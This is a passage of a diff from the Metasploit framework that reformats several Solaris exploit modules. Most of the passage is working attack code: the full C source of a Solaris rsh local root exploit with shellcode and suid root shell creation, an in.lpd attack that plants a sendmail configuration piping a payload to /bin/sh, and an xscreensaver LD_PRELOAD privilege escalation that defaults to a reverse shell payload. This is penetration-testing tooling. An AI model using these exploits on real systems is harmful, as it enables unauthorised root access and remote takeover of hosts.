+                          found_pid = 1;
+                          if (WIFEXITED(status) || WIFSIGNALED(status))
+                              workers[i_worker].pid = 0;
+                      } else {
+                          timersub(&stop, &workers[i_worker].start, &diff);
+                          if (diff.tv_sec >= TIMEOUT)
+                              if (kill(worker_pid, SIGKILL)) die();
+                      }
+                  }
+                  if (!found_pid) {
+                      if (pid != -1) die();
+                      continue;
+                  }
+                  if (WIFEXITED(status)) {
+                      if (WEXITSTATUS(status) != EXIT_FAILURE)
+                          fprintf(stderr, "exited %d\\n", WEXITSTATUS(status));
+                      break;
+                  } else if (WIFSIGNALED(status)) {
+                      if (WTERMSIG(status) != SIGSEGV)
+                          fprintf(stderr, "signal %d\\n", WTERMSIG(status));
+                      break;
+                  } else if (WIFSTOPPED(status)) {
+                      fprintf(stderr, "stopped %d\\n", WSTOPSIG(status));
+                      is_suid_rootshell |= is_suid_root(ROOTSHELL);
+                      if (kill(pid, SIGKILL)) die();
+                      continue;
+                  }
+                  fprintf(stderr, "unknown %d\\n", status);
+                  die();
+              }
+              if (is_suid_rootshell) {
+                  system("ls -lL " ROOTSHELL);
+                  exit(EXIT_SUCCESS);
+              }
+              n_workers--;
+          }
+          if (n_workers >= N_WORKERS) die();
+
+          static char rsh_link[64];
+          if (*rsh_link != '/') {
+              const int rsh_fd = open(RSH, O_RDONLY);
+              if (rsh_fd <= STDERR_FILENO) die();
+              if ((unsigned int)snprintf(rsh_link, sizeof(rsh_link),
+                  "/proc/%ld/fd/%d", (long)getpid(), rsh_fd) >= sizeof(rsh_link)) die();
+              if (access(rsh_link, R_OK | X_OK)) die();
+              if (*rsh_link != '/') die();
+          }
+
+          static int null_fd = -1;
+          if (null_fd <= -1) {
+              null_fd = open("/dev/null", O_RDWR);
+              if (null_fd <= -1) die();
+          }
+
+          const pid_t pid = fork();
+          if (pid <= -1) die();
+          if (pid == 0) {
+              const struct rlimit stack = { s, s };
+              if (setrlimit(RLIMIT_STACK, &stack)) die();
+
+              if (dup2(null_fd, STDIN_FILENO) != STDIN_FILENO) die();
+              if (dup2(null_fd, STDOUT_FILENO) != STDOUT_FILENO) die();
+              if (dup2(null_fd, STDERR_FILENO) != STDERR_FILENO) die();
+
+              static char * const argv[] = { rsh_link, "-?", NULL };
+              char * const envp[] = { (char *)lca, (char *)pad, NULL };
+              execve(*argv, argv, envp);
+              die();
+          }
+          if (gettimeofday(&start, NULL)) die();
+          for (i_worker = 0; i_worker < N_WORKERS; i_worker++) {
+              const pid_t worker_pid = workers[i_worker].pid;
+              if (worker_pid > 0) continue;
+              if (worker_pid != 0) die();
+              workers[i_worker].pid = pid;
+              workers[i_worker].start = start;
+              n_workers++;
+              return;
+          }
+          die();
+      }
+
+      int main(const int argc, const char * const argv[])
+      {
+          static const struct rlimit core;
+          if (setrlimit(RLIMIT_CORE, &core)) die();
+
+          if (geteuid() == 0) {
+              if (is_suid_root(ROOTSHELL)) {
+                  if (setuid(0)) die();
+                  if (setgid(0)) die();
+                  static char * const argv[] = { "/bin/sh", NULL };
+                  execve(*argv, argv, NULL);
+                  die();
+              }
+              chown(*argv, 0, 0);
+              chmod(*argv, 04555);
+              for (;;) {
+                  raise(SIGSTOP);
+                  sleep(1);
+              }
+              die();
+          }
+
+          const size_t i = strtoul(argv[1], NULL, 10);
+          if (i >= sizeof(targets)/sizeof(*targets)) die();
+          target = targets + i;
+          fprintf(stderr, "Target %zu %s\\n", i, target->name);
+
+          if (target->a >= 16) die();
+          if (target->b >= 16) die();
+          if (target->i <= 0) die();
+          if (target->j >= 16 || target->j % 4) {
+              if (target->j != SIZE_MAX) die();
+          }
+
+          static const struct sigaction sigalarm_action = { .sa_handler = sigalarm_handler };
+          if (sigaction(SIGALRM, &sigalarm_action, NULL)) die();
+
+          size_t s;
+          for (s = target->s_first; s <= target->s_last; s += target->s_step) {
+              if (s % target->s_step) die();
+
+              size_t l;
+              for (l = target->l_first; l <= target->l_last; l += target->l_step) {
+                  if (l % target->l_step) die();
+                  const char * const lca = build_lca(l);
+                  fprintf(stdout, "s %zu l %zu\\n", s, l);
+
+                  size_t p;
+                  for (p = target->p_first; p <= target->p_last; p += target->p_step) {
+                      if (p % target->p_step) die();
+                      const char * const pad = build_pad(p);
+                      fork_worker(s, lca, pad);
+                  }
+              }
+          }
+          fprintf(stdout, "Failed\\n");
+      }
+    EOF
+
+    exp
   end
 
   def exploit
     if is_root?
-      fail_with Failure::BadConfig, 'Session already has root privileges'
+      fail_with(Failure::BadConfig, 'Session already has root privileges')
     end
 
-    unless writable? datastore['WritableDir']
-      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
+    unless writable?(datastore['WritableDir'])
+      fail_with(Failure::BadConfig, "#{datastore['WritableDir']} is not writable")
     end
 
-    if target.name.eql? 'Automatic'
+    if target.name.eql?('Automatic')
       case kernel_version
       when '11.1'
         my_target = targets[1]
@@ -169,377 +513,40 @@ class MetasploitModule < Msf::Exploit::Local
         my_target = targets[2]
         arg = 1
       else
-        fail_with Failure::NoTarget, 'Unable to automatically select a target'
+        fail_with(Failure::NoTarget, 'Unable to automatically select a target')
       end
     else
       my_target = target
     end
-    print_status "Using target: #{my_target.name}"
+    print_status("Using target: #{my_target.name}")
 
-    base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
-    mkdir base_path
+    base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
+    mkdir(base_path)
 
-    # Solaris_rsh.c by Qualys
-    # modified for Metasploit
-    workers = datastore['WORKERS'].to_i
-    root_shell = 'ROOT'
-    shellcode = '\x31\xc0\x50\x68'
-    shellcode << root_shell
-    shellcode << '\x89\xe3\x50\x53\x89\xe2\x50\x50'
-    shellcode << '\x52\x53\xb0\x3C\x48\x50\xcd\x91'
-    shellcode << '\x31\xc0\x40\x50\x50\xcd\x91Z'
-    exp = <<-EOF
-/*
- * Solaris_rsh.c for CVE-2017-3630, CVE-2017-3629, CVE-2017-3631
- * Copyright (C) 2017 Qualys, Inc.
- *
- * This program is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with this program.  If not, see <http://www.gnu.org/licenses/>.
- */
+    exploit_name = ".#{rand_text_alphanumeric(5..15)}"
+    upload_and_compile("#{base_path}/#{exploit_name}", solaris_rsh_exploit)
+    symlink("#{base_path}/#{exploit_name}", "#{base_path}/#{root_shell}")
 
-#include <errno.h>
-#include <fcntl.h>
-#include <signal.h>
-#include <stdint.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/fcntl.h>
-#include <sys/resource.h>
-#include <sys/stat.h>
-#include <sys/time.h>
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-
-#ifndef timersub
-#define timersub(a, b, result) \\
-    do { \\
-        (result)->tv_sec = (a)->tv_sec - (b)->tv_sec; \\
-        (result)->tv_usec = (a)->tv_usec - (b)->tv_usec; \\
-        if ((result)->tv_usec < 0) { \\
-            --(result)->tv_sec; \\
-            (result)->tv_usec += 1000000; \\
-        } \\
-    } while (0)
-#endif
-
-#define RSH "#{rsh_path}"
-static const struct target * target;
-static const struct target {
-    const char * name;
-    size_t s_first, s_last, s_step;
-    size_t l_first, l_last, l_step;
-    size_t p_first, p_last, p_step;
-    size_t a, b;
-    size_t i, j;
-}
-targets[] = {
-    {
-        .name = "Oracle Solaris 11.1 X86 (Assembled 19 September 2012)",
-        .s_first = 16*1024, .s_last = 44*1024, .s_step = 4096,
-        .l_first = 192,     .l_last = 512,     .l_step = 16,
-        .p_first = 0,       .p_last = 8192,    .p_step = 1,
-        .a = 0,             .b = 15,           .j = 12,
-        .i = 0x08052608 /* pop edx; pop ebp; ret */
-    },
-    {
-        .name = "Oracle Solaris 11.3 X86 (Assembled 06 October 2015)",
-        .s_first = 12*1024, .s_last = 44*1024, .s_step = 4096,
-        .l_first = 96,      .l_last = 512,     .l_step = 4,
-        .p_first = 0,       .p_last = 4096,    .p_step = 4,
-        .a = 0,             .b = 3,            .j = SIZE_MAX,
-        .i = 0x07faa7ea /* call *0xc(%ebp) */
-    },
-};
-
-#define ROOTSHELL "#{root_shell}"
-static const char shellcode[] = "#{shellcode}";
-
-static volatile sig_atomic_t sigalarm;
-
-static void
-sigalarm_handler(const int signum __attribute__((__unused__)))
-{
-    sigalarm = 1;
-}
-
-#define die() do { \\
-    fprintf(stderr, "died in %s: %u\\n", __func__, __LINE__); \\
-    exit(EXIT_FAILURE); \\
-} while (0)
-
-static int
-is_suid_root(const char * const file)
-{
-    if (!file) die();
-    static struct stat sbuf;
-    if (stat(file, &sbuf)) die();
-    if (!S_ISREG(sbuf.st_mode)) die();
-    return ((sbuf.st_uid == 0) && (sbuf.st_mode & S_ISUID));
-}
-
-static const char *
-build_lca(const size_t l)
-{
-    static const size_t shellcode_len = sizeof(shellcode)-1;
-    if (shellcode_len > 64) die();
-    if (shellcode_len % 16) die();
-    if (l < shellcode_len + target->a + target->b) die();
-
-    #define LCA_MAX 4096
-    if (l > LCA_MAX) die();
-    static char lca[128 + LCA_MAX];
-    strcpy(lca, "LC_ALL=");
-    char * cp = memchr(lca, '\\0', sizeof(lca));
-    if (!cp) die();
-    memcpy(cp, shellcode, shellcode_len);
-    cp += shellcode_len;
-    memset(cp, 'a', target->a);
-
-    size_t o;
-    for (o = target->a; l - o >= 4; o += 4) {
-        if ((o - target->a) % 16 == target->j) {
-            cp[o + 0] = '\\xeb';
-            cp[o + 1] = (o - target->a >= 16) ? -(16u + 2u) :
-                -(shellcode_len + target->a + target->j + 2);
-            cp[o + 2] = 'j';
-            cp[o + 3] = 'j';
-        } else {
-            if (sizeof(size_t) != 4) die();
-            *(size_t *)(cp + o) = target->i;
-        }
-    }
-    cp += o;
-    memset(cp, 'b', target->b);
-    cp[target->b] = '\\0';
-    if (strlen(lca) != 7 + shellcode_len + o + target->b) die();
-    return lca;
-}
-
-static const char *
-build_pad(const size_t p)
-{
-    #define PAD_MAX 8192
-    if (p > PAD_MAX) die();
-    static char pad[64 + PAD_MAX];
-    strcpy(pad, "P=");
-    char * const cp = memchr(pad, '\\0', sizeof(pad));
-    if (!cp) die();
-    memset(cp, 'p', p);
-    cp[p] = '\\0';
-    if (strlen(pad) != 2 + p) die();
-    return pad;
-}
-
-static void
-fork_worker(const size_t s, const char * const lca, const char * const pad)
-{
-    #define N_WORKERS #{workers.to_i}
-    static size_t n_workers;
-    static struct {
-        pid_t pid;
-        struct timeval start;
-    } workers[N_WORKERS];
-
-    size_t i_worker;
-    struct timeval start, stop, diff;
-
-    if (n_workers >= N_WORKERS) {
-        if (n_workers != N_WORKERS) die();
-        int is_suid_rootshell = 0;
-        for (;;) {
-            sigalarm = 0;
-            #define TIMEOUT 10
-            alarm(TIMEOUT);
-            int status = 0;
-            const pid_t pid = waitpid(-1, &status, WUNTRACED);
-            alarm(0);
-            if (gettimeofday(&stop, NULL)) die();
-
-            if (pid <= 0) {
-                if (pid != -1) die();
-                if (errno != EINTR) die();
-                if (sigalarm != 1) die();
-            }
-            int found_pid = 0;
-            for (i_worker = 0; i_worker < N_WORKERS; i_worker++) {
-                const pid_t worker_pid = workers[i_worker].pid;
-                if (worker_pid <= 0) die();
-                if (worker_pid == pid) {
-                    if (found_pid) die();
-                    found_pid = 1;
-                    if (WIFEXITED(status) || WIFSIGNALED(status))
-                        workers[i_worker].pid = 0;
-                } else {
-                    timersub(&stop, &workers[i_worker].start, &diff);
-                    if (diff.tv_sec >= TIMEOUT)
-                        if (kill(worker_pid, SIGKILL)) die();
-                }
-            }
-            if (!found_pid) {
-                if (pid != -1) die();
-                continue;
-            }
-            if (WIFEXITED(status)) {
-                if (WEXITSTATUS(status) != EXIT_FAILURE)
-                    fprintf(stderr, "exited %d\\n", WEXITSTATUS(status));
-                break;
-            } else if (WIFSIGNALED(status)) {
-                if (WTERMSIG(status) != SIGSEGV)
-                    fprintf(stderr, "signal %d\\n", WTERMSIG(status));
-                break;
-            } else if (WIFSTOPPED(status)) {
-                fprintf(stderr, "stopped %d\\n", WSTOPSIG(status));
-                is_suid_rootshell |= is_suid_root(ROOTSHELL);
-                if (kill(pid, SIGKILL)) die();
-                continue;
-            }
-            fprintf(stderr, "unknown %d\\n", status);
-            die();
-        }
-        if (is_suid_rootshell) {
-            system("ls -lL " ROOTSHELL);
-            exit(EXIT_SUCCESS);
-        }
-        n_workers--;
-    }
-    if (n_workers >= N_WORKERS) die();
-
-    static char rsh_link[64];
-    if (*rsh_link != '/') {
-        const int rsh_fd = open(RSH, O_RDONLY);
-        if (rsh_fd <= STDERR_FILENO) die();
-        if ((unsigned int)snprintf(rsh_link, sizeof(rsh_link),
-            "/proc/%ld/fd/%d", (long)getpid(), rsh_fd) >= sizeof(rsh_link)) die();
-        if (access(rsh_link, R_OK | X_OK)) die();
-        if (*rsh_link != '/') die();
-    }
-
-    static int null_fd = -1;
-    if (null_fd <= -1) {
-        null_fd = open("/dev/null", O_RDWR);
-        if (null_fd <= -1) die();
-    }
-
-    const pid_t pid = fork();
-    if (pid <= -1) die();
-    if (pid == 0) {
-        const struct rlimit stack = { s, s };
-        if (setrlimit(RLIMIT_STACK, &stack)) die();
-
-        if (dup2(null_fd, STDIN_FILENO) != STDIN_FILENO) die();
-        if (dup2(null_fd, STDOUT_FILENO) != STDOUT_FILENO) die();
-        if (dup2(null_fd, STDERR_FILENO) != STDERR_FILENO) die();
-
-        static char * const argv[] = { rsh_link, "-?", NULL };
-        char * const envp[] = { (char *)lca, (char *)pad, NULL };
-        execve(*argv, argv, envp);
-        die();
-    }
-    if (gettimeofday(&start, NULL)) die();
-    for (i_worker = 0; i_worker < N_WORKERS; i_worker++) {
-        const pid_t worker_pid = workers[i_worker].pid;
-        if (worker_pid > 0) continue;
-        if (worker_pid != 0) die();
-        workers[i_worker].pid = pid;
-        workers[i_worker].start = start;
-        n_workers++;
-        return;
-    }
-    die();
-}
-
-int main(const int argc, const char * const argv[])
-{
-    static const struct rlimit core;
-    if (setrlimit(RLIMIT_CORE, &core)) die();
-
-    if (geteuid() == 0) {
-        if (is_suid_root(ROOTSHELL)) {
-            if (setuid(0)) die();
-            if (setgid(0)) die();
-            static char * const argv[] = { "/bin/sh", NULL };
-            execve(*argv, argv, NULL);
-            die();
-        }
-        chown(*argv, 0, 0);
-        chmod(*argv, 04555);
-        for (;;) {
-            raise(SIGSTOP);
-            sleep(1);
-        }
-        die();
-    }
-
-    const size_t i = strtoul(argv[1], NULL, 10);
-    if (i >= sizeof(targets)/sizeof(*targets)) die();
-    target = targets + i;
-    fprintf(stderr, "Target %zu %s\\n", i, target->name);
-
-    if (target->a >= 16) die();
-    if (target->b >= 16) die();
-    if (target->i <= 0) die();
-    if (target->j >= 16 || target->j % 4) {
-        if (target->j != SIZE_MAX) die();
-    }
-
-    static const struct sigaction sigalarm_action = { .sa_handler = sigalarm_handler };
-    if (sigaction(SIGALRM, &sigalarm_action, NULL)) die();
-
-    size_t s;
-    for (s = target->s_first; s <= target->s_last; s += target->s_step) {
-        if (s % target->s_step) die();
-
-        size_t l;
-        for (l = target->l_first; l <= target->l_last; l += target->l_step) {
-            if (l % target->l_step) die();
-            const char * const lca = build_lca(l);
-            fprintf(stdout, "s %zu l %zu\\n", s, l);
-
-            size_t p;
-            for (p = target->p_first; p <= target->p_last; p += target->p_step) {
-                if (p % target->p_step) die();
-                const char * const pad = build_pad(p);
-                fork_worker(s, lca, pad);
-            }
-        }
-    }
-    fprintf(stdout, "Failed\\n");
-}
-    EOF
-
-    exploit_name = ".#{rand_text_alphanumeric 5..15}"
-    upload_and_compile "#{base_path}/#{exploit_name}", exp
-    symlink "#{base_path}/#{exploit_name}", "#{base_path}/#{root_shell}"
-
-    print_status "Creating suid root shell. This may take a while..."
-    cmd_exec "cd #{base_path}"
+    timeout = 1_800
+    print_status("Creating suid root shell. This may take a while (timeout: #{timeout}s) ...")
+    cmd_exec("cd #{base_path}")
     start = Time.now
-    output = cmd_exec "./#{exploit_name} #{arg}", nil, 1_800
+    output = cmd_exec("./#{exploit_name} #{arg}", nil, timeout)
     stop = Time.now
-    print_status "Completed in #{(stop - start).round(2)}s"
-    unless output.include? 'root'
+    print_status("Completed in #{(stop - start).round(2)}s")
+
+    unless output.include?('root')
       fail_with Failure::Unknown, "Failed to create suid root shell: #{output}"
     end
-    print_good "suid root shell created: #{base_path}/#{root_shell}"
 
-    payload_name = ".#{rand_text_alphanumeric 5..10}"
+    print_good("suid root shell created: #{base_path}/#{root_shell}")
+
+    payload_name = ".#{rand_text_alphanumeric(5..10)}"
     payload_path = "#{base_path}/#{payload_name}"
-    upload payload_path, payload.encoded
-    cmd_exec "chmod +x '#{payload_path}'"
+    upload(payload_path, payload.encoded)
+    cmd_exec("chmod +x '#{payload_path}'")
 
-    print_status 'Executing payload...'
-    cmd_exec "echo #{payload_path} | ./#{root_shell} & echo "
+    print_status('Executing payload...')
+    cmd_exec("echo '#{payload_path}' | ./#{root_shell} & echo ")
   end
 end

--- a/modules/exploits/solaris/local/xscreensaver_log_priv_esc.rb
+++ b/modules/exploits/solaris/local/xscreensaver_log_priv_esc.rb
@@ -15,28 +15,29 @@ class MetasploitModule < Msf::Exploit::Local
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Solaris xscreensaver log Privilege Escalation',
-      'Description'    => %q{
-        This module exploits a vulnerability in `xscreensaver` versions
-        since 5.06 on unpatched Solaris 11 systems which allows users
-        to gain root privileges.
+    super(
+      update_info(
+        info,
+        'Name' => 'Solaris xscreensaver log Privilege Escalation',
+        'Description' => %q{
+          This module exploits a vulnerability in `xscreensaver` versions
+          since 5.06 on unpatched Solaris 11 systems which allows users
+          to gain root privileges.
 
-        `xscreensaver` allows users to create a user-owned file at any
-        location on the filesystem using the `-log` command line argument
-        introduced in version 5.06.
+          `xscreensaver` allows users to create a user-owned file at any
+          location on the filesystem using the `-log` command line argument
+          introduced in version 5.06.
 
-        This module uses `xscreensaver` to create a log file in `/usr/lib/secure/`,
-        overwrites the log file with a shared object, and executes the shared
-        object using the `LD_PRELOAD` environment variable.
+          This module uses `xscreensaver` to create a log file in `/usr/lib/secure/`,
+          overwrites the log file with a shared object, and executes the shared
+          object using the `LD_PRELOAD` environment variable.
 
-        This module has been tested successfully on:
+          This module has been tested successfully on:
 
-        xscreensaver version 5.15 on Solaris 11.1 (x86); and
-        xscreensaver version 5.15 on Solaris 11.3 (x86).
-      },
-      'References'     =>
-        [
+          xscreensaver version 5.15 on Solaris 11.1 (x86); and
+          xscreensaver version 5.15 on Solaris 11.3 (x86).
+        },
+        'References' => [
           ['CVE', '2019-3010'],
           ['EDB', '47509'],
           ['URL', 'https://seclists.org/fulldisclosure/2019/Oct/39'],
@@ -44,30 +45,31 @@ class MetasploitModule < Msf::Exploit::Local
           ['URL', 'https://techblog.mediaservice.net/2019/10/local-privilege-escalation-on-solaris-11-x-via-xscreensaver/'],
           ['URL', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html']
         ],
-      'Notes'          => {
-        'Stability' => [CRASH_SAFE],
-        'SideEffects' => [],
-        'Reliability' => [],
-        'AKA' => ['raptor_xscreensaver'] },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => [],
+          'AKA' => ['raptor_xscreensaver']
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Marco Ivaldi', # Discovery and exploit
-          'bcoles'        # Metasploit
+          'bcoles' # Metasploit
         ],
-      'DisclosureDate' => '2019-10-16',
-      'Privileged'     => true,
-      'Platform'       => ['solaris', 'unix'],
-      'Arch'           => [ARCH_CMD],
-      'Targets'        => [['Auto', {}]],
-      'SessionTypes'   => ['shell', 'meterpreter'],
-      'DefaultOptions' =>
-        {
-          'PAYLOAD'     => 'cmd/unix/reverse_ksh',
-          'WfsDelay'    => 10,
+        'DisclosureDate' => '2019-10-16',
+        'Privileged' => true,
+        'Platform' => ['solaris', 'unix'],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [['Auto', {}]],
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse_ksh',
+          'WfsDelay' => 10,
           'PrependFork' => true
         },
-      'DefaultTarget'  => 0))
+        'DefaultTarget' => 0
+      )
+    )
     register_options [
       OptString.new('XSCREENSAVER_PATH', [true, 'Path to xscreensaver executable', '/usr/bin/xscreensaver']),
       OptString.new('XORG_PATH', [true, 'Path to Xorg executable', '/usr/bin/Xorg'])
@@ -124,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
     vprint_good 'gcc is installed'
 
-    xscreensaver_version = cmd_exec("#{xscreensaver_path} --help").to_s.scan(/^xscreensaver ([\d\.]+)/).flatten.first
+    xscreensaver_version = cmd_exec("#{xscreensaver_path} --help").to_s.scan(/^xscreensaver ([\d.]+)/).flatten.first
     if xscreensaver_version.to_s.eql? ''
       vprint_error 'Could not determine xscreensaver version'
       return CheckCode::Detected
@@ -165,9 +167,9 @@ class MetasploitModule < Msf::Exploit::Local
     # Create writable log file in /usr/lib/secure/
     lib_name = rand_text_alphanumeric 5..10
     if cmd_exec("/usr/bin/file #{xscreensaver_path}").to_s.include? 'ELF 64-bit'
-      secure_path = "/usr/lib/secure/64/"
+      secure_path = '/usr/lib/secure/64/'
     else
-      secure_path = "/usr/lib/secure/"
+      secure_path = '/usr/lib/secure/'
     end
     lib_path = "#{secure_path}#{lib_name}.so"
 

--- a/modules/exploits/solaris/lpd/sendmail_exec.rb
+++ b/modules/exploits/solaris/lpd/sendmail_exec.rb
@@ -3,91 +3,94 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'English'
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Solaris LPD Command Execution',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Solaris LPD Command Execution',
+        'Description' => %q{
           This module exploits an arbitrary command execution flaw in
-        the in.lpd service shipped with all versions of Sun Solaris
-        up to and including 8.0. This module uses a technique
-        discovered by Dino Dai Zovi to exploit the flaw without
-        needing to know the resolved name of the attacking system.
-      },
-      'Author'         => [ 'hdm', 'ddz' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          [ 'CVE', '2001-1583'],
-          [ 'OSVDB', '15131'],
-          [ 'BID', '3274'],
-        ],
-      'Platform'       => %w{ solaris unix },
-      'Arch'           => ARCH_CMD,
-      'Payload'        =>
-        {
-          'Space'       => 8192,
-          'DisableNops' => true,
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic perl telnet',
-            }
+          the in.lpd service shipped with all versions of Sun Solaris
+          up to and including 8.0. This module uses a technique
+          discovered by Dino Dai Zovi to exploit the flaw without
+          needing to know the resolved name of the attacking system.
         },
-      'Targets'        =>
-        [
-          [ 'Automatic Target', { }]
+        'Author' => [ 'hdm', 'ddz' ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2001-1583'],
+          ['OSVDB', '15131'],
+          ['BID', '3274'],
         ],
-      'DisclosureDate' => '2001-08-31',
-      'DefaultTarget' => 0))
+        'Platform' => %w[solaris unix],
+        'Arch' => ARCH_CMD,
+        'Payload' => {
+          'Space' => 8192,
+          'DisableNops' => true,
+          'Compat' => {
+            'PayloadType' => 'cmd',
+            'RequiredCmd' => 'generic perl telnet'
+          }
+        },
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2001-08-31',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
 
-    register_options(
-      [
-        Opt::RPORT(515)
-      ])
+    register_options([
+      Opt::RPORT(515)
+    ])
   end
 
   def exploit
-
     # This is the temporary path created in the spool directory
-    spath = "/var/spool/print"
+    spath = '/var/spool/print'
 
     # The job ID is squashed down to three decimal digits
-    jid   = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
+    jid = ($PROCESS_ID % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
 
     # The control file
     control =
-      "H"+"metasploit\n"+
-      "P"+"\\\"-C"+spath+"/"+jid+"mail.cf\\\" nobody\n"+
-      "f"+"dfA"+jid+"config\n"+
-      "f"+"dfA"+jid+"script\n"
-
+      'H' + "metasploit\n" \
+      'P' + '\"-C' + spath + '/' + jid + "mail.cf\\\" nobody\n" \
+      'f' + 'dfA' + jid + "config\n" \
+      'f' + 'dfA' + jid + "script\n"
 
     # The mail configuration file
     mailcf =
-      "V8\n"+
-      "\n"+
-      "Ou0\n"+
-      "Og0\n"+
-      "OL0\n"+
-      "Oeq\n"+
-      "OQX/tmp\n"+
-      "\n"+
-      "FX|/bin/sh #{spath}/#{jid}script\n"+
-      "\n"+
-      "S3\n"+
-      "S0\n"+
-      "R\+     #local \\@blah :blah\n"+
-      "S1\n"+
-      "S2\n"+
-      "S4\n"+
-      "S5\n"+
-      "\n"+
-      "Mlocal  P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"+
+      "V8\n" \
+      "\n" \
+      "Ou0\n" \
+      "Og0\n" \
+      "OL0\n" \
+      "Oeq\n" \
+      "OQX/tmp\n" \
+      "\n" \
+      "FX|/bin/sh #{spath}/#{jid}script\n" \
+      "\n" \
+      "S3\n" \
+      "S0\n" \
+      "R\+     #local \\@blah :blah\n" \
+      "S1\n" \
+      "S2\n" \
+      "S4\n" \
+      "S5\n" \
+      "\n" \
+      "Mlocal  P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n" \
       "Mprog   P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"
 
     # Establish the first connection to the server
@@ -96,16 +99,16 @@ class MetasploitModule < Msf::Exploit::Remote
     # Request a cascaded job
     sock1.put("\x02metasploit:framework\n")
     res = sock1.get_once
-    if (not res)
-      print_status("The target did not accept our job request command")
+    if !res
+      print_status('The target did not accept our job request command')
       return
     end
 
-    print_status("Configuring the spool directory...")
+    print_status('Configuring the spool directory...')
     if !(
-        send_file(sock1, 2, "cfA" + jid + "metasploit", control) and
-        send_file(sock1, 3, jid + "mail.cf", mailcf) and
-        send_file(sock1, 3, jid + "script", payload.encoded)
+        send_file(sock1, 2, 'cfA' + jid + 'metasploit', control) &&
+        send_file(sock1, 3, jid + 'mail.cf', mailcf) &&
+        send_file(sock1, 3, jid + 'script', payload.encoded)
       )
       sock1.close
       return
@@ -117,15 +120,15 @@ class MetasploitModule < Msf::Exploit::Remote
     # Request another cascaded job
     sock2.put("\x02localhost:metasploit\n")
     res = sock2.get_once
-    if (not res)
-      print_status("The target did not accept our second job request command")
+    if !res
+      print_status('The target did not accept our second job request command')
       return
     end
 
-    print_status("Attempting to trigger the vulnerable call to the mail program...")
+    print_status('Attempting to trigger the vulnerable call to the mail program...')
     if !(
-        send_file(sock2, 2, "cfA" + jid + "metasploit", control) and
-        send_file(sock2, 3, "dfa" + jid + "config", mailcf)
+        send_file(sock2, 2, 'cfA' + jid + 'metasploit', control) &&
+        send_file(sock2, 3, 'dfa' + jid + 'config', mailcf)
       )
       sock1.close
       sock2.close
@@ -135,25 +138,24 @@ class MetasploitModule < Msf::Exploit::Remote
     sock1.close
     sock2.close
 
-    print_status("Waiting up to 60 seconds for the payload to execute...")
-    select(nil,nil,nil,60)
+    print_status('Waiting up to 60 seconds for the payload to execute...')
+    select(nil, nil, nil, 60)
 
     handler
   end
 
-  def send_file(s, type, name, data='')
-
-    s.put(type.chr + data.length.to_s + " " + name + "\n")
-    res = s.get_once(1)
-    if !(res and res[0,1] == "\x00")
+  def send_file(socket, type, name, data = '')
+    socket.put(type.chr + "#{data.length} #{name}\n")
+    res = socket.get_once(1)
+    if !(res && (res[0, 1] == "\x00"))
       print_status("The target did not accept our control file command (#{name})")
       return
     end
 
-    s.put(data)
-    s.put("\x00")
-    res = s.get_once(1)
-    if !(res and res[0,1] == "\x00")
+    socket.put(data)
+    socket.put("\x00")
+    res = socket.get_once(1)
+    if !(res && (res[0, 1] == "\x00"))
       print_status("The target did not accept our control file data (#{name})")
       return
     end

--- a/modules/exploits/solaris/samba/lsa_transnames_heap.rb
+++ b/modules/exploits/solaris/samba/lsa_transnames_heap.rb
@@ -11,84 +11,91 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Brute
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Samba lsa_io_trans_names Heap Overflow',
-      'Description'    => %q{
-        This module triggers a heap overflow in the LSA RPC service
-      of the Samba daemon. This module uses the TALLOC chunk overwrite
-      method (credit Ramon and Adriano), which only works with Samba
-      versions 3.0.21-3.0.24. Additionally, this module will not work
-      when the Samba "log level" parameter is higher than "2".
-      },
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Samba lsa_io_trans_names Heap Overflow',
+        'Description' => %q{
+          This module triggers a heap overflow in the LSA RPC service
+          of the Samba daemon. This module uses the TALLOC chunk overwrite
+          method (credit Ramon and Adriano), which only works with Samba
